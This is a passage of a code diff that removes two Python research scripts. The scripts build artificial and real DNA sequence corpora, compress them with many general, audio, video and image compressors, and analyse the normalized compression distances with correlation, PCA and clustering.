"AGT","AGC","AGA","AGG","GGT","GGC","GGA","GGG","TAT","TAC","TGT","TGC","TGG",
|
|
||||||
"CAT","CAC","CAA","CAG","AAT","AAC","AAA","AAG","GAT","GAC","GAA","GAG"]]
|
|
||||||
for s in range(4):
|
|
||||||
random.seed(SEED + s + 200)
|
|
||||||
seq_list = []
|
|
||||||
while len(seq_list) * 3 < n:
|
|
||||||
seq_list.append(random.choice(codons))
|
|
||||||
if random.random() < 0.05:
|
|
||||||
seq_list.append(random.choice(["TAA","TAG","TGA"]))
|
|
||||||
seq = "".join(seq_list)[:n]
|
|
||||||
corpus[f"codon_{s}"] = seq
|
|
||||||
|
|
||||||
# Repeat (6)
|
|
||||||
for periods, label in [
|
|
||||||
([2,4,8,16], "pow2"), ([2,3,5,7,11], "primes"),
|
|
||||||
([3,7,15,31], "shift"), ([10,20,50,100], "large"),
|
|
||||||
([1,2,3,5,8,13], "fib"), ([4,8,16,32,64,128], "binary")]:
|
|
||||||
seq_list = []
|
|
||||||
while len(seq_list) < n:
|
|
||||||
period = random.choice(periods)
|
|
||||||
unit = "".join(chr(65 + rng_local.randint(0, 4)) for _ in range(period))
|
|
||||||
unit = unit.replace("E","T").replace("B","G").replace("D","C")
|
|
||||||
reps = max(1, (n - len(seq_list)) // period)
|
|
||||||
seq_list.extend(unit * reps)
|
|
||||||
corpus[f"repeat_{label}"] = "".join(seq_list)[:n]
|
|
||||||
|
|
||||||
# GC-skewed (5)
|
|
||||||
for gc in [0.00, 0.25, 0.50, 0.75, 1.00]:
|
|
||||||
ng = int(n * gc)
|
|
||||||
na = n - ng
|
|
||||||
seq = list("G" * ng + "A" * na)
|
|
||||||
random.shuffle(seq)
|
|
||||||
corpus[f"gc_{int(gc*100):03d}"] = "".join(seq)
|
|
||||||
|
|
||||||
# Markov (4)
|
|
||||||
for s in range(4):
|
|
||||||
random.seed(SEED + s + 400)
|
|
||||||
seq = list(ecoli_data[:order])
|
|
||||||
while len(seq) < n:
|
|
||||||
ctx = "".join(seq[-order:])
|
|
||||||
choices = trans.get(ctx, {"A":1,"C":1,"G":1,"T":1})
|
|
||||||
total = sum(choices.values())
|
|
||||||
r = random.randint(0, total - 1)
|
|
||||||
cum = 0
|
|
||||||
for base, cnt in choices.items():
|
|
||||||
cum += cnt
|
|
||||||
if r < cum:
|
|
||||||
seq.append(base)
|
|
||||||
break
|
|
||||||
corpus[f"markov_{s}"] = "".join(seq)[:n]
|
|
||||||
|
|
||||||
# Real (4)
|
|
||||||
for label, genomes in [("ecoli", [ecoli_data]), ("chr21", [])]:
|
|
||||||
if label == "chr21":
|
|
||||||
chr21_path = "/home/allaun/dna_benchmark/data/chr21.fa.gz"
|
|
||||||
if os.path.exists(chr21_path):
|
|
||||||
raw2 = []
|
|
||||||
with gz.open(chr21_path, "rt") as f:
|
|
||||||
for line in f:
|
|
||||||
if not line.startswith(">"):
|
|
||||||
raw2.append(line.strip().upper())
|
|
||||||
genomes = ["".join(raw2)]
|
|
||||||
for gidx, genome in enumerate(genomes):
|
|
||||||
for s in range(2):
|
|
||||||
start = s * n + 50000
|
|
||||||
if start + n <= len(genome):
|
|
||||||
corpus[f"real_{label}_{s}"] = genome[start:start+n]
|
|
||||||
|
|
||||||
# Write corpus
|
|
||||||
for name, seq in corpus.items():
|
|
||||||
with open(CORPUSDIR / f"{name}.dna", "w") as f:
|
|
||||||
f.write(seq)
|
|
||||||
|
|
||||||
return corpus
|
|
||||||
|
|
||||||
# ── Custom compressor wrappers ──
|
|
||||||
|
|
||||||
def compress_custom(data: bytes, comp_name: str, temp_dir: str) -> int:
|
|
||||||
"""Handle custom compressor invocations (audio/video/image/7z/lrzip)."""
|
|
||||||
import shutil
|
|
||||||
|
|
||||||
infile = os.path.join(temp_dir, "input.bin")
|
|
||||||
outfile_pattern = os.path.join(temp_dir, "output")
|
|
||||||
|
|
||||||
with open(infile, "wb") as f:
|
|
||||||
f.write(data)
|
|
||||||
|
|
||||||
try:
|
|
||||||
if comp_name == "7z":
|
|
||||||
outfile = outfile_pattern + ".7z"
|
|
||||||
subprocess.run(["7z", "a", "-mx=9", "-mmt=off", outfile, infile],
|
|
||||||
capture_output=True, timeout=30)
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
elif comp_name == "pixz":
|
|
||||||
outfile = outfile_pattern + ".xz"
|
|
||||||
subprocess.run(["pixz", "-9", infile, outfile],
|
|
||||||
capture_output=True, timeout=30)
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
elif comp_name == "lrzip":
|
|
||||||
outfile = infile + ".lrz"
|
|
||||||
subprocess.run(["lrzip", "-L9", "-f", infile],
|
|
||||||
capture_output=True, timeout=30)
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
elif comp_name.startswith("flac"):
|
|
||||||
outfile = outfile_pattern + ".flac"
|
|
||||||
bits = np.frombuffer(data, dtype=np.uint8).astype(np.int16) - 128
|
|
||||||
samples = bits.astype(np.int16).tobytes()
|
|
||||||
|
|
||||||
if comp_name == "flac-8":
|
|
||||||
subprocess.run(["flac", "-8", "--force", "-o", outfile, "-"],
|
|
||||||
input=samples, capture_output=True, timeout=30)
|
|
||||||
else:
|
|
||||||
subprocess.run(["flac", "--force", "-o", outfile, "-"],
|
|
||||||
input=samples, capture_output=True, timeout=30)
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
elif comp_name.startswith("wavpack"):
|
|
||||||
outfile = outfile_pattern + ".wv"
|
|
||||||
bits = np.frombuffer(data, dtype=np.uint8).astype(np.int16) - 128
|
|
||||||
samples = bits.astype(np.int16).tobytes()
|
|
||||||
|
|
||||||
if comp_name == "wavpack-hhx":
|
|
||||||
subprocess.run(["wavpack", "-hhx", "-q", "-y", "-", "-o", outfile],
|
|
||||||
input=samples, capture_output=True, timeout=30)
|
|
||||||
else:
|
|
||||||
subprocess.run(["wavpack", "-q", "-y", "-", "-o", outfile],
|
|
||||||
input=samples, capture_output=True, timeout=30)
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
elif comp_name in ("ffv1", "ffvhuff", "huffyuv", "utvideo"):
|
|
||||||
# Encode bytes as raw 8-bit grayscale video (64x64 frames)
|
|
||||||
n_bytes = len(data)
|
|
||||||
side = 64
|
|
||||||
pixels_per_frame = side * side
|
|
||||||
n_frames = max(1, n_bytes // pixels_per_frame)
|
|
||||||
|
|
||||||
frame_data = np.frombuffer(data[:n_frames * pixels_per_frame], dtype=np.uint8)
|
|
||||||
frame_data = frame_data.reshape(n_frames, side, side)
|
|
||||||
|
|
||||||
# Write raw video via pipe
|
|
||||||
proc = subprocess.Popen(
|
|
||||||
["ffmpeg", "-y", "-f", "rawvideo", "-pix_fmt", "gray",
|
|
||||||
"-s", f"{side}x{side}", "-r", "30", "-i", "pipe:0",
|
|
||||||
"-c:v", comp_name, "-pix_fmt", "gray",
|
|
||||||
"-f", "matroska" if comp_name == "ffv1" else "avi",
|
|
||||||
outfile_pattern + (".mkv" if comp_name == "ffv1" else ".avi")],
|
|
||||||
stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
|
|
||||||
)
|
|
||||||
proc.communicate(input=frame_data.tobytes(), timeout=30)
|
|
||||||
proc.wait()
|
|
||||||
|
|
||||||
out = outfile_pattern + (".mkv" if comp_name == "ffv1" else ".avi")
|
|
||||||
return os.path.getsize(out) if os.path.exists(out) else len(data)
|
|
||||||
|
|
||||||
elif comp_name in ("png", "jpeg-xl", "webp"):
|
|
||||||
# Encode as 2D image (nearest square)
|
|
||||||
side = int(np.ceil(np.sqrt(len(data))))
|
|
||||||
padded = np.zeros(side * side, dtype=np.uint8)
|
|
||||||
padded[:len(data)] = np.frombuffer(data, dtype=np.uint8)
|
|
||||||
img = padded.reshape(side, side)
|
|
||||||
|
|
||||||
# Use PIL or ffmpeg
|
|
||||||
from PIL import Image
|
|
||||||
pil_img = Image.fromarray(img, mode="L")
|
|
||||||
|
|
||||||
if comp_name == "png":
|
|
||||||
outfile = outfile_pattern + ".png"
|
|
||||||
pil_img.save(outfile, "PNG", optimize=True)
|
|
||||||
elif comp_name == "jpeg-xl":
|
|
||||||
outfile = outfile_pattern + ".jxl"
|
|
||||||
pil_img.save(outfile, "JPEGXL", lossless=True, effort=9)
|
|
||||||
elif comp_name == "webp":
|
|
||||||
outfile = outfile_pattern + ".webp"
|
|
||||||
pil_img.save(outfile, "WEBP", lossless=True, quality=100, method=6)
|
|
||||||
|
|
||||||
return os.path.getsize(outfile) if os.path.exists(outfile) else len(data)
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
pass
|
|
||||||
|
|
||||||
return len(data)
|
|
||||||
|
|
||||||
# ── Main Pipeline ──
|
|
||||||
|
|
||||||
def run_manifold_survey():
|
|
||||||
print("=" * 64)
|
|
||||||
print("COMPRESSOR MANIFOLD SURVEY — 28 Lossless Compressors")
|
|
||||||
print("=" * 64)
|
|
||||||
|
|
||||||
# Build corpus
|
|
||||||
print("\n[1/5] Building 54-sequence genetic corpus...")
|
|
||||||
corpus = build_corpus()
|
|
||||||
names = sorted(corpus.keys())
|
|
||||||
n_seqs = len(names)
|
|
||||||
print(f" {n_seqs} sequences × {SEQUENCE_LENGTH:,} bases")
|
|
||||||
|
|
||||||
# Register compressors
|
|
||||||
comp_list = sorted(COMPRESSORS.keys())
|
|
||||||
n_comps = len(comp_list)
|
|
||||||
print(f"\n[2/5] Compressor registry: {n_comps} tools")
|
|
||||||
for dom in ["general", "audio", "video", "image"]:
|
|
||||||
members = [c for c in comp_list if COMPRESSORS[c]["domain"] == dom]
|
|
||||||
print(f" {dom:8s}: {len(members):2d} — {', '.join(members)}")
|
|
||||||
|
|
||||||
# Compress all sequences
|
|
||||||
print(f"\n[3/5] Compressing {n_seqs} × {n_comps} = {n_seqs*n_comps} combinations...")
|
|
||||||
|
|
||||||
compressed_sizes = {} # (name, comp) -> size
|
|
||||||
total = n_seqs * n_comps
|
|
||||||
done = 0
|
|
||||||
|
|
||||||
for name in names:
|
|
||||||
seq = corpus[name]
|
|
||||||
dna_bytes = seq.encode()
|
|
||||||
|
|
||||||
for comp in comp_list:
|
|
||||||
info = COMPRESSORS[comp]
|
|
||||||
|
|
||||||
if info.get("custom"):
|
|
||||||
with tempfile.TemporaryDirectory() as td:
|
|
||||||
sz = compress_custom(dna_bytes, comp, td)
|
|
||||||
elif info["cmd"]:
|
|
||||||
r = subprocess.run(info["cmd"], input=dna_bytes,
|
|
||||||
capture_output=True, timeout=30)
|
|
||||||
sz = len(r.stdout) if r.stdout else len(dna_bytes)
|
|
||||||
else:
|
|
||||||
sz = len(dna_bytes)
|
|
||||||
|
|
||||||
compressed_sizes[(name, comp)] = sz
|
|
||||||
done += 1
|
|
||||||
|
|
||||||
if done % 200 == 0:
|
|
||||||
print(f" {done}/{total} measurements...")
|
|
||||||
|
|
||||||
print(f" Complete: {len(compressed_sizes)} compression measurements")
|
|
||||||
|
|
||||||
# NCD per compressor
|
|
||||||
print(f"\n[4/5] Building NCD matrices per compressor...")
|
|
||||||
|
|
||||||
ncd_matrices = {} # comp -> n_seqs x n_seqs
|
|
||||||
comp_vectors = {} # comp -> flat vector of NCD values (for pairwise comparison)
|
|
||||||
|
|
||||||
pairs_needed = n_seqs * (n_seqs - 1) // 2
|
|
||||||
|
|
||||||
for comp in comp_list:
|
|
||||||
C = {name: compressed_sizes.get((name, comp), len(corpus[name].encode()))
|
|
||||||
for name in names}
|
|
||||||
|
|
||||||
# Full pairwise NCD via concatenation
|
|
||||||
ncd_flat = np.zeros(pairs_needed)
|
|
||||||
pair_idx = 0
|
|
||||||
|
|
||||||
for i in range(n_seqs):
|
|
||||||
for j in range(i + 1, n_seqs):
|
|
||||||
xy = (corpus[names[i]] + corpus[names[j]]).encode()
|
|
||||||
cxy = compressed_individual(xy, comp, COMPRESSORS[comp])
|
|
||||||
|
|
||||||
cx = C[names[i]]
|
|
||||||
cy = C[names[j]]
|
|
||||||
den = max(cx, cy)
|
|
||||||
if den > 0:
|
|
||||||
ncd = max(0.0, min(1.0, (cxy - min(cx, cy)) / den))
|
|
||||||
else:
|
|
||||||
ncd = 0.0
|
|
||||||
|
|
||||||
ncd_flat[pair_idx] = ncd
|
|
||||||
pair_idx += 1
|
|
||||||
|
|
||||||
comp_vectors[comp] = ncd_flat
|
|
||||||
|
|
||||||
if len(comp_list) <= 5 or comp in comp_list[:3]:
|
|
||||||
print(f" {comp:18s}: {pairs_needed} pairs computed")
|
|
||||||
|
|
||||||
# Cross-compressor correlation matrix
|
|
||||||
print(f"\n[5/5] Building cross-compressor manifold...")
|
|
||||||
|
|
||||||
corr_matrix = np.zeros((n_comps, n_comps))
|
|
||||||
|
|
||||||
for a_idx, ca in enumerate(comp_list):
|
|
||||||
va = comp_vectors[ca]
|
|
||||||
for b_idx, cb in enumerate(comp_list):
|
|
||||||
if a_idx <= b_idx:
|
|
||||||
# Spearman rank correlation of NCD vectors
|
|
||||||
rho, _ = stats.spearmanr(va, comp_vectors[cb])
|
|
||||||
corr_matrix[a_idx, b_idx] = rho
|
|
||||||
corr_matrix[b_idx, a_idx] = rho
|
|
||||||
|
|
||||||
# PCA on correlation matrix → manifold coordinates
|
|
||||||
# Center the correlation matrix
|
|
||||||
corr_centered = corr_matrix - corr_matrix.mean(axis=0)
|
|
||||||
|
|
||||||
U, S, Vt = np.linalg.svd(corr_centered, full_matrices=False)
|
|
||||||
|
|
||||||
# First 3 components → manifold coordinates
|
|
||||||
coords = {}
|
|
||||||
for i, comp in enumerate(comp_list):
|
|
||||||
coords[comp] = {
|
|
||||||
"x": round(float(Vt[0, i]) * S[0], 6),
|
|
||||||
"y": round(float(Vt[1, i]) * S[1], 6) if len(S) > 1 else 0.0,
|
|
||||||
"z": round(float(Vt[2, i]) * S[2], 6) if len(S) > 2 else 0.0,
|
|
||||||
}
|
|
||||||
|
|
||||||
# Eigen-decomposition of correlation matrix
|
|
||||||
e_vals, e_vecs = np.linalg.eigh(corr_matrix)
|
|
||||||
order = np.argsort(-np.abs(e_vals))
|
|
||||||
e_vals = e_vals[order]
|
|
||||||
e_vecs = e_vecs[:, order]
|
|
||||||
|
|
||||||
# Clustering
|
|
||||||
from scipy.cluster.hierarchy import linkage, fcluster
|
|
||||||
|
|
||||||
# Distance = 1 - correlation
|
|
||||||
dist_matrix = 1 - corr_matrix
|
|
||||||
dist_condensed = squareform(dist_matrix)
|
|
||||||
linkage_matrix = linkage(dist_condensed, method="ward")
|
|
||||||
clusters = fcluster(linkage_matrix, t=0.15, criterion="distance")
|
|
||||||
|
|
||||||
cluster_groups = defaultdict(list)
|
|
||||||
for i, comp in enumerate(comp_list):
|
|
||||||
cluster_groups[int(clusters[i])].append(comp)
|
|
||||||
|
|
||||||
# ── Output ──
|
|
||||||
print(f"\n{'='*64}")
|
|
||||||
print("MANIFOLD COORDINATES (PCA on cross-compressor correlation)")
|
|
||||||
print("=" * 64)
|
|
||||||
print(f"\n {'Compressor':18s} {'Domain':10s} {'x':>10s} {'y':>10s} {'z':>10s}")
|
|
||||||
print(f" {'─'*18} {'─'*10} {'─'*10} {'─'*10} {'─'*10}")
|
|
||||||
|
|
||||||
for comp in sorted(comp_list, key=lambda c: comp_vectors[c].mean()):
|
|
||||||
c = coords[comp]
|
|
||||||
dom = COMPRESSORS[comp]["domain"]
|
|
||||||
print(f" {comp:18s} {dom:10s} {c['x']:+10.4f} {c['y']:+10.4f} {c['z']:+10.4f}")
|
|
||||||
|
|
||||||
print(f"\n{'='*64}")
|
|
||||||
print("EIGENVALUES (correlation matrix spectrum)")
|
|
||||||
print("=" * 64)
|
|
||||||
for i in range(min(8, len(e_vals))):
|
|
||||||
print(f" λ{i} = {e_vals[i]:+10.6f} (explained: {abs(e_vals[i])/abs(e_vals).sum()*100:.1f}%)")
|
|
||||||
|
|
||||||
print(f"\n{'='*64}")
|
|
||||||
print("CLUSTER STRUCTURE (Ward linkage, t=0.15)")
|
|
||||||
print("=" * 64)
|
|
||||||
for gid, members in sorted(cluster_groups.items()):
|
|
||||||
domains = Counter(COMPRESSORS[m]["domain"] for m in members)
|
|
||||||
dom_str = ", ".join(f"{d}:{c}" for d, c in domains.items())
|
|
||||||
print(f" Cluster {gid} ({len(members)} tools, {dom_str})")
|
|
||||||
for m in sorted(members):
|
|
||||||
print(f" {m}")
|
|
||||||
|
|
||||||
# ── Save ──
|
|
||||||
report = {
|
|
||||||
"corpus": {"n_sequences": n_seqs, "sequence_length": SEQUENCE_LENGTH, "families": list(set(n.split("_")[0] for n in names))},
|
|
||||||
"compressors": {c: COMPRESSORS[c] for c in comp_list},
|
|
||||||
"manifold_coordinates": coords,
|
|
||||||
"eigenvalues": e_vals[:min(10, len(e_vals))].tolist(),
|
|
||||||
"clusters": {int(k): v for k, v in cluster_groups.items()},
|
|
||||||
"correlation_matrix": {comp_list[i]: {comp_list[j]: round(float(corr_matrix[i,j]), 6) for j in range(n_comps)} for i in range(n_comps)},
|
|
||||||
"compression_stats": {f"{k[0]}__{k[1]}": v for k, v in compressed_sizes.items()},
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(OUTDIR / "compressor_manifold.json", "w") as f:
|
|
||||||
json.dump(report, f, indent=2, sort_keys=True, default=str)
|
|
||||||
|
|
||||||
print(f"\nSaved: {OUTDIR / 'compressor_manifold.json'}")
|
|
||||||
|
|
||||||
def compressed_individual(data: bytes, comp: str, info: dict) -> int:
|
|
||||||
"""Compress a single blob and return size."""
|
|
||||||
if info.get("custom"):
|
|
||||||
with tempfile.TemporaryDirectory() as td:
|
|
||||||
return compress_custom(data, comp, td)
|
|
||||||
elif info["cmd"]:
|
|
||||||
r = subprocess.run(info["cmd"], input=data, capture_output=True, timeout=30)
|
|
||||||
return len(r.stdout) if r.stdout else len(data)
|
|
||||||
return len(data)
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
run_manifold_survey()
|
|
||||||
|
|
@ -1,559 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Compressor Eigenvalue Survey — Artificial Genetic Sequences
|
|
||||||
=============================================================
|
|
||||||
|
|
||||||
Generates 50 artificial genetic sequences across 6 structural families,
|
|
||||||
compresses each with 6 tools (brotli, zstd, xz, gzip, bzip2, lz4), builds
|
|
||||||
Normalized Compression Distance matrices, and eigen-decomposes to reveal
|
|
||||||
which compressors are structurally equivalent and which sequence families
|
|
||||||
separate cleanest.
|
|
||||||
|
|
||||||
Families:
|
|
||||||
1. uniform — single base repeated
|
|
||||||
2. random — uniform random ACGT
|
|
||||||
3. codon — valid codon triplets with stop/start structure
|
|
||||||
4. repeat — tandem repeats with variable period
|
|
||||||
5. gc_skewed — GC-biased (0%, 25%, 50%, 75%, 100% GC)
|
|
||||||
6. real — real E. coli + human chr21 slices
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os, sys, time, json, subprocess, tempfile, hashlib, random, shutil, glob
|
|
||||||
import numpy as np
|
|
||||||
from collections import defaultdict
|
|
||||||
from pathlib import Path
|
|
||||||
|
|
||||||
# ── Config ──
|
|
||||||
OUTDIR = Path("/home/allaun/dna_benchmark/eigenvalue_survey")
|
|
||||||
OUTDIR.mkdir(parents=True, exist_ok=True)
|
|
||||||
CORPUSDIR = OUTDIR / "corpus"
|
|
||||||
CORPUSDIR.mkdir(exist_ok=True)
|
|
||||||
|
|
||||||
COMPRESSORS = ["brotli", "zstd", "xz", "gzip", "bzip2", "lz4"]
|
|
||||||
SEQUENCE_LENGTH = 100_000 # bases per sequence
|
|
||||||
SEED = 42
|
|
||||||
|
|
||||||
random.seed(SEED)
|
|
||||||
rng = np.random.RandomState(SEED)
|
|
||||||
|
|
||||||
# ── Sequence Generators ──
|
|
||||||
|
|
||||||
def make_uniform(base: str, n: int) -> str:
|
|
||||||
return base * n
|
|
||||||
|
|
||||||
def make_random(n: int, alphabet: str = "ACGT") -> str:
|
|
||||||
return "".join(random.choice(alphabet) for _ in range(n))
|
|
||||||
|
|
||||||
def make_codon_structured(n: int) -> str:
|
|
||||||
"""Valid codon triplets with start (ATG) and stop (TAA/TAG/TGA) sprinkled."""
|
|
||||||
codons = [
|
|
||||||
"TTT","TTC","TTA","TTG","TCT","TCC","TCA","TCG",
|
|
||||||
"TAT","TAC","TGT","TGC","TGG","CTT","CTC","CTA","CTG",
|
|
||||||
"CCT","CCC","CCA","CCG","CAT","CAC","CAA","CAG",
|
|
||||||
"CGT","CGC","CGA","CGG","ATT","ATC","ATA","ATG",
|
|
||||||
"ACT","ACC","ACA","ACG","AAT","AAC","AAA","AAG",
|
|
||||||
"AGT","AGC","AGA","AGG","GTT","GTC","GTA","GTG",
|
|
||||||
"GCT","GCC","GCA","GCG","GAT","GAC","GAA","GAG",
|
|
||||||
"GGT","GGC","GGA","GGG",
|
|
||||||
]
|
|
||||||
stops = ["TAA","TAG","TGA"]
|
|
||||||
|
|
||||||
seq = []
|
|
||||||
while len(seq) < n // 3:
|
|
||||||
seq.append(random.choice(codons))
|
|
||||||
if random.random() < 0.05: # 5% chance of stop
|
|
||||||
seq.append(random.choice(stops))
|
|
||||||
if random.random() < 0.5:
|
|
||||||
seq.append("ATG") # restart
|
|
||||||
|
|
||||||
result = "".join(seq)[:n]
|
|
||||||
if len(result) < n:
|
|
||||||
result += "A" * (n - len(result))
|
|
||||||
return result
|
|
||||||
|
|
||||||
def make_tandem_repeat(n: int, periods: list = None) -> str:
|
|
||||||
"""Varying tandem repeats."""
|
|
||||||
if periods is None:
|
|
||||||
periods = [2, 3, 4, 5, 7, 11, 17, 23, 47, 101]
|
|
||||||
|
|
||||||
seq = []
|
|
||||||
while len(seq) < n:
|
|
||||||
period = random.choice(periods)
|
|
||||||
unit = make_random(period)
|
|
||||||
reps = max(1, min(100, (n - len(seq)) // period))
|
|
||||||
seq.extend(unit * reps)
|
|
||||||
|
|
||||||
return "".join(seq)[:n]
|
|
||||||
|
|
||||||
def make_gc_skewed(n: int, gc_fraction: float) -> str:
|
|
||||||
"""Generate sequence with exact GC fraction."""
|
|
||||||
at_bases = ["A", "T"]
|
|
||||||
gc_bases = ["G", "C"]
|
|
||||||
n_gc = int(n * gc_fraction)
|
|
||||||
n_at = n - n_gc
|
|
||||||
|
|
||||||
seq = [random.choice(gc_bases) for _ in range(n_gc)] + \
|
|
||||||
[random.choice(at_bases) for _ in range(n_at)]
|
|
||||||
random.shuffle(seq)
|
|
||||||
return "".join(seq)
|
|
||||||
|
|
||||||
def make_markov_structured(n: int, order: int = 2) -> str:
|
|
||||||
"""Generate sequence from Markov chain with pronounced transition bias."""
|
|
||||||
# Learn from E. coli if available, else use fixed transition matrix
|
|
||||||
ecoli_path = "/home/allaun/dna_benchmark/data/ecoli.fna.gz"
|
|
||||||
if os.path.exists(ecoli_path):
|
|
||||||
import gzip
|
|
||||||
raw = []
|
|
||||||
with gzip.open(ecoli_path, "rt") as f:
|
|
||||||
for line in f:
|
|
||||||
if not line.startswith(">"):
|
|
||||||
raw.append(line.strip().upper())
|
|
||||||
ecoli = "".join(raw)[:500000]
|
|
||||||
# Build transition counts
|
|
||||||
trans = defaultdict(lambda: defaultdict(int))
|
|
||||||
for i in range(len(ecoli) - order):
|
|
||||||
ctx = ecoli[i:i+order]
|
|
||||||
nxt = ecoli[i+order]
|
|
||||||
trans[ctx][nxt] += 1
|
|
||||||
|
|
||||||
# Generate from learned transitions
|
|
||||||
seq = list(ecoli[:order]) # seed with real context
|
|
||||||
while len(seq) < n:
|
|
||||||
ctx = "".join(seq[-order:])
|
|
||||||
choices = trans.get(ctx, {"A":1,"C":1,"G":1,"T":1})
|
|
||||||
total = sum(choices.values())
|
|
||||||
r = random.randint(0, total - 1)
|
|
||||||
cum = 0
|
|
||||||
for base, count in choices.items():
|
|
||||||
cum += count
|
|
||||||
if r < cum:
|
|
||||||
seq.append(base)
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
# Fallback: simple GC-bias Markov chain
|
|
||||||
seq = list(make_random(order))
|
|
||||||
while len(seq) < n:
|
|
||||||
ctx = "".join(seq[-order:])
|
|
||||||
gc_count = sum(1 for c in ctx if c in "GC")
|
|
||||||
p_gc = max(0.1, min(0.9, gc_count / order + random.uniform(-0.1, 0.1)))
|
|
||||||
if random.random() < p_gc:
|
|
||||||
seq.append(random.choice("GC"))
|
|
||||||
else:
|
|
||||||
seq.append(random.choice("AT"))
|
|
||||||
|
|
||||||
return "".join(seq)[:n]
|
|
||||||
|
|
||||||
# ── Build Corpus ──
|
|
||||||
|
|
||||||
# Move helper before corpus section
|
|
||||||
def _shannon_entropy(seq: str) -> float:
|
|
||||||
from collections import Counter
|
|
||||||
c = Counter(seq)
|
|
||||||
n = len(seq)
|
|
||||||
return -sum((v/n) * np.log2(v/n) for v in c.values() if v > 0)
|
|
||||||
|
|
||||||
print("=" * 60)
|
|
||||||
print("GENERATING ARTIFICIAL GENETIC SEQUENCE CORPUS")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
corpus = {}
|
|
||||||
|
|
||||||
# Family 1: Uniform (8 sequences)
|
|
||||||
print("\n[Family: uniform]")
|
|
||||||
for base in ["A", "C", "G", "T"]:
|
|
||||||
for mult in [1, 2, 3, 5, 10]:
|
|
||||||
unit = base * mult
|
|
||||||
seq = make_uniform(base, SEQUENCE_LENGTH)
|
|
||||||
name = f"uniform_{unit[:20]}_x{len(seq)//len(unit)}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases")
|
|
||||||
|
|
||||||
# Family 2: Random (5 sequences)
|
|
||||||
print("\n[Family: random]")
|
|
||||||
for i, n in enumerate([SEQUENCE_LENGTH]):
|
|
||||||
for seed_offset in range(5):
|
|
||||||
random.seed(SEED + seed_offset + 100)
|
|
||||||
seq = make_random(n)
|
|
||||||
name = f"random_seed{seed_offset}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases entropy={_shannon_entropy(seq):.2f}")
|
|
||||||
|
|
||||||
# Family 3: Codon-structured (5 sequences)
|
|
||||||
print("\n[Family: codon]")
|
|
||||||
for seed_offset in range(5):
|
|
||||||
random.seed(SEED + seed_offset + 200)
|
|
||||||
seq = make_codon_structured(SEQUENCE_LENGTH)
|
|
||||||
name = f"codon_seed{seed_offset}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases")
|
|
||||||
|
|
||||||
# Family 4: Tandem repeats (8 sequences)
|
|
||||||
print("\n[Family: repeat]")
|
|
||||||
repeat_configs = [
|
|
||||||
([2, 4, 8, 16], "pow2"),
|
|
||||||
([2, 3, 5, 7, 11], "primes"),
|
|
||||||
([10, 20, 50, 100], "large"),
|
|
||||||
([3, 7, 15, 31], "shift"),
|
|
||||||
([2, 4, 6, 8, 10], "even"),
|
|
||||||
([1, 2, 3, 5, 8, 13], "fib"),
|
|
||||||
([11, 23, 47], "sparse"),
|
|
||||||
([4, 8, 16, 32, 64, 128], "binary"),
|
|
||||||
]
|
|
||||||
for periods, label in repeat_configs:
|
|
||||||
random.seed(SEED + 300)
|
|
||||||
seq = make_tandem_repeat(SEQUENCE_LENGTH, periods)
|
|
||||||
name = f"repeat_{label}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases periods={periods}")
|
|
||||||
|
|
||||||
# Family 5: GC-skewed (5 sequences)
|
|
||||||
print("\n[Family: gc_skewed]")
|
|
||||||
for gc in [0.00, 0.25, 0.50, 0.75, 1.00]:
|
|
||||||
seq = make_gc_skewed(SEQUENCE_LENGTH, gc)
|
|
||||||
name = f"gc_skewed_{int(gc*100):03d}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases GC={gc:.0%}")
|
|
||||||
|
|
||||||
# Family 6: Markov-structured (5 sequences)
|
|
||||||
print("\n[Family: markov]")
|
|
||||||
for seed_offset in range(5):
|
|
||||||
random.seed(SEED + seed_offset + 400)
|
|
||||||
seq = make_markov_structured(SEQUENCE_LENGTH, order=2)
|
|
||||||
name = f"markov_seed{seed_offset}"
|
|
||||||
corpus[name] = seq
|
|
||||||
print(f" {name:40s} {len(seq):,} bases")
|
|
||||||
|
|
||||||
# Family 7: Real slices (6 sequences)
|
|
||||||
print("\n[Family: real]")
|
|
||||||
import gzip
|
|
||||||
real_names = []
|
|
||||||
for label, path in [("ecoli", "/home/allaun/dna_benchmark/data/ecoli.fna.gz"),
|
|
||||||
("chr21", "/home/allaun/dna_benchmark/data/chr21.fa.gz")]:
|
|
||||||
raw = []
|
|
||||||
with gzip.open(path, "rt") as f:
|
|
||||||
for line in f:
|
|
||||||
if not line.startswith(">"):
|
|
||||||
raw.append(line.strip().upper())
|
|
||||||
genome = "".join(raw)
|
|
||||||
for i in range(3):
|
|
||||||
start = i * SEQUENCE_LENGTH + 50000
|
|
||||||
seq = genome[start:start + SEQUENCE_LENGTH]
|
|
||||||
if len(seq) >= SEQUENCE_LENGTH // 2:
|
|
||||||
name = f"real_{label}_slice{i}"
|
|
||||||
corpus[name] = seq
|
|
||||||
real_names.append(name)
|
|
||||||
print(f" {name:40s} {len(seq):,} bases pos={start}")
|
|
||||||
|
|
||||||
# Write corpus
|
|
||||||
print(f"\nTotal sequences: {len(corpus)}")
|
|
||||||
for name, seq in corpus.items():
|
|
||||||
fname = name + ".dna"
|
|
||||||
with open(CORPUSDIR / fname, "w") as f:
|
|
||||||
